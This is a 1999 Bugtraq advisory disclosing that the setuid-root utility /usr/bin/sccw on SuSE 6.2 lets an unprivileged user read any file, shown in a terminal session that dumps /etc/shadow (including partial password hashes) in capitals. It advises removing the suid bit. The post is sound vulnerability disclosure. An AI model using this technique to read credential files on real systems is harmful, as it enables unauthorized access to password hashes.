Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

SuSE 6.2 /usr/bin/sccw read any file

From: btellier () WEBLEY COM (Brock Tellier)
Date: Thu, 16 Sep 1999 19:28:02 -0500

Greetings,

    /usr/bin/sccw, suid root by default on SuSE 6.2, allows any user to
read any file on the system.  Sort of.  Well, it's enough to read the
text of almost anything.  In capitals.  Without punctuation.  Check it
out:

xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > sccw
==========================================================
Soundcard CW for Linux  v1.1  Steven J. Merrifield, VK3ESM
==========================================================
1. Set the speed, currently = 10
2. Set the frequency, currently = 700
3. Set the volume, currently = 32
4. Set the delay value, currently = 3
5. Set the character set for random groups, currently = 1
6. Set the number of groups, currently = 5
7. Receive random character groups.
8. Receive a file.
9. QUIT
==========================================================
Enter your choice : 8
Enter filename : /etc/shadow
ROOTFGPZNZWZ5GWRG10850010000
BIN8902010000
DAEMON8902010000
... etc.
The printing of these lines takes a few seconds each, so be patient.
While you're waiting, remove the suid-bit.
Of course, getting the /etc/shadow file in all caps isn't instant root,
but it's a start for someone out there.  Besides, he can still read your
mail in all caps, without punctuation.

Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
Previous By Date Next
Previous By Thread Next

Current thread: